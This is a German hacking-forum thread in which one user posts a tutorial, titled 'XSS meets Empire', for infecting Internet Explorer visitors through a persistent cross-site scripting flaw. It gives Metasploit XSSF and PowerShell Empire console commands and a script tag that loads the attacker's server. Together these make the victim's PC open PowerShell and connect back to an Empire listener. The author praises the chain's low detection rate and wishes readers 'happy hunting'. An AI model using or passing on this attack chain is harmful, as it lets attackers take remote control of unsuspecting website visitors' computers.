Ergebnis 1 bis 3 von 3
  1. #1
    NoClose Wurm Avatar von Braz
    Registriert seit
    19.05.2015
    Beiträge
    159

    Cool XSS meets Empire

    Hey Leute,

    Hier wie angekündigt ein kleines Tutorial, wie ihr über eine persistente XSS einen Internet Explorer User infizieren könnt.

    Was wird benötigt:
    1. Linux Distribution
    2. Empire-Framework: https://github.com/PowerShellEmpire/Empire
    3. Metasploit-Framework: https://github.com/rapid7/metasploit-framework
    4. XSS-Framework: https://github.com/sempervictus/xssf
    5. Eine persistente XSS-Lücke


    Ich gehe nicht auf die Installation von Empire & MSF ein, da diese weit und breit im Internet zu finden sind.
    Das XSS-Framework ist ein Plugin für Metasploit, daher müssen die Dateien richtig importiert werden.
    Hier jeweils die Dateien von XSSF richtig in die vorhande Metasploit Architektur einfplegen.

    Ist das Setup komplett, müsst ihr initial das XSSF in der Metasploit-Konsole einbinden:
    Code:
    msfconsole
    Code:
    load xssf
    Nun könnt ihr euch nach dem Eintippen von
    Code:
    xssf_
    über die TAB-Taste die weiteren Funktionen anzeigen lassen.

    Für unser Vorhaben schauen wir uns als erstes die URLs an, welche wir zur Verbindung benötigen.
    Dies macht man über den Befehl:
    Code:
    xssf_urls
    Der Output bei mir:
    Code:
    msf> xssf_urls 
    [+] XSSF Server      : 'http://meinserver:8888/'         or 'http://<PUBLIC-IP>:8888/'
    [+] Generic XSS injection: 'http://meinserver:8888/loop'     or 'http://<PUBLIC-IP>:8888/loop'
    [+] XSSF test page     : 'http://meinserver/test.html' or 'http://<PUBLIC-IP>:8888/test.html'
    
    
    [+] XSSF Tunnel Proxy    : 'localhost:8889'
    [+] XSSF logs page    : 'http://localhost:8889/gui.html?guipage=main'
    [+] XSSF statistics page: 'http://localhost:8889/gui.html?guipage=stats'
    [+] XSSF help page    : 'http://localhost:8889/gui.html?guipage=help'
    Der Generic XSS Injections Server ist für unser Belangen gedacht.
    Hierzu habe ich bei meinem Router den Port 8888 geöffnet.

    Nun könnt ihr schon mit der XSS loslegen indem ihr folgendes Script einbaut:
    <script src="http://euerserver:8888/loop?interval=2"></script>

    Die XSS-Verbindung funktioniert zwar jetzt, ist aber immer noch nutzlos:

    Für die Client-Exploitation verwende ich zur Zeit Powershell im Empire-Framework,
    da dieses fast so gut ist wie der Meterpreter und dabei eine niedrigere/keine Erkennungsrate hat.

    Hierzu das Empire-FW öffnen und per
    Code:
    listeners
    Code:
    options
    nun die Settings des Listeners anzeigen lassen.
    Mit
    Code:
    set
    müsst ihr jetzt die Konfiguration anpassen,
    um ihn anschließend mit
    Code:
    execute
    zu starten.

    Ab hier horcht das Empire-FW auf neue Verbindungen.

    Wie verbinde ich jetzt alle Komponenten?

    #1
    Wir parametrieren & erstellen den Payload im Empire-FW mit:
    Code:
    usestager launcher
    Code:
    set EureOptionen
    Code:
    execute
    Nach erfolgreichem Parametrieren, wird der Powershell.exe Command ausgegeben.

    #2
    In Metasploit:
    Code:
    use auxiliary/xssf/public/IE/command
    Code:
    set Command DenObenAusgegebenenPowershellCommand
    Code:
    exploit -j
    Das Modul läuft im Hintergrund und hat eine Job-ID.
    Diese lässt sich herausfinden über:
    Code:
    jobs
    Da ihr wahrscheinlich nichts im MSF laufen habt, hat die ID die Kennung "0".

    Wenn jetzt mit
    Code:
    xssf_add_auto_attack 0
    das Ganze abgeschlossen wird, passiert folgendes:

    Victim surft auf die Seite, wo eine XSS versteckt ist.
    XSS triggert automatisch das Modul *IE/Command.
    Victim bekommt eine Meldung von ActiveX, welcher er mit "Ja" bestätigen muss.
    Victim-PC öffnet kurz eine Powershell und stellt die finale Verbindung mit Empire her.

    Falls jemand Anregungen, zum ändern dieses Textes hat, einfach schreiben!

    Happy hunting!
    Geändert von Braz (24.04.2016 um 19:17 Uhr)
    ______________________________________
    Seitdem ich perfekt bin, hält sich meine Arroganz in Grenzen.

  2. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    iTzAk47 (25.04.2016), n00kie (25.04.2016), NoNameMT (24.04.2016), schteal (10.05.2016), sn0w (26.04.2016), Southpark (25.04.2016), zzurc (17.05.2016)

  3. #2
    DateMake Dialer Avatar von iTzAk47
    Registriert seit
    20.03.2016
    Beiträge
    97

    Standard AW: XSS meets Empire

    Kann ich erstmal soweit nichts mit anfangen, aber trotzdem Danke für deine Bemühungen!

  4. #3
    NoClose Wurm Avatar von Braz
    Registriert seit
    19.05.2015
    Beiträge
    159

    Standard AW: XSS meets Empire

    Hey iTzAk47,

    Wo gibts Probleme? Gerne helf ich weiter.

    VG,
    Braz
    ______________________________________
    Seitdem ich perfekt bin, hält sich meine Arroganz in Grenzen.

Ähnliche Themen

  1. XSS meets HTML Injection
    Von trisn im Forum Biete Tutorials
    Antworten: 2
    Letzter Beitrag: 12.09.2009, 09:35
  2. Phishing meets XSS - A Powerful Duo
    Von Cheese im Forum Biete Tutorials
    Antworten: 4
    Letzter Beitrag: 24.02.2009, 17:38

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •